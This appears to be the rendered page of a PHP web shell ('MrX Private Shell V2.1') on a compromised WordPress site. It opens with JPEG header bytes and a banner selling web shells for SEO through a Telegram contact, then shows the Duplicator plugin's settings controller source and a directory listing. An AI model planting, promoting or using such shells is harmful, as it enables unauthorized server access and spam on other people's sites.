����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
DUP_Util::hasCapability('manage_options');
global $wpdb;
//COMMON HEADER DISPLAY
require_once(DUPLICATOR_PLUGIN_PATH . '/assets/js/javascript.php');
require_once(DUPLICATOR_PLUGIN_PATH . '/views/inc.header.php');
$current_tab = isset($_REQUEST['tab']) ? sanitize_text_field($_REQUEST['tab']) : 'general';
?>
<style>
</style>
<div class="wrap">
<?php duplicator_header(__("Settings", 'duplicator')) ?>
<h2 class="nav-tab-wrapper">
<a href="?page=duplicator-settings&tab=general" class="nav-tab <?php echo ($current_tab == 'general') ? 'nav-tab-active' : '' ?>"> <?php esc_html_e('General', 'duplicator'); ?></a>
<a href="?page=duplicator-settings&tab=package" class="nav-tab <?php echo ($current_tab == 'package') ? 'nav-tab-active' : '' ?>"> <?php esc_html_e('Packages', 'duplicator'); ?></a>
<a href="?page=duplicator-settings&tab=schedule" class="nav-tab <?php echo ($current_tab == 'schedule') ? 'nav-tab-active' : '' ?>"> <?php esc_html_e('Schedules', 'duplicator'); ?></a>
<a href="?page=duplicator-settings&tab=storage" class="nav-tab <?php echo ($current_tab == 'storage') ? 'nav-tab-active' : '' ?>"> <?php esc_html_e('Storage', 'duplicator'); ?></a>
<a href="?page=duplicator-settings&tab=license" class="nav-tab <?php echo ($current_tab == 'license') ? 'nav-tab-active' : '' ?>"> <?php esc_html_e('License', 'duplicator'); ?></a>
<a href="?page=duplicator-settings&tab=about" class="nav-tab <?php echo ($current_tab == 'about') ? 'nav-tab-active' : '' ?>"> <?php esc_html_e('About', 'duplicator'); ?></a>
</h2>
<?php
switch ($current_tab) {
case 'general': include('general.php');
break;
case 'package': include('packages.php');
break;
case 'schedule': include('schedule.php');
break;
case 'storage': include('storage.php');
break;
case 'license': include('license.php');
break;
case 'about': include('about-info.php');
break;
}
?>
</div>
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| about-info.php | File | 9.99 KB | 0644 |
|
| controller.php | File | 2.02 KB | 0644 |
|
| general.php | File | 8.32 KB | 0644 |
|
| gopro.php | File | 12.36 KB | 0644 |
|
| license.php | File | 1.91 KB | 0644 |
|
| packages.php | File | 15.33 KB | 0644 |
|
| schedule.php | File | 992 B | 0644 |
|
| storage.php | File | 1.6 KB | 0644 |
|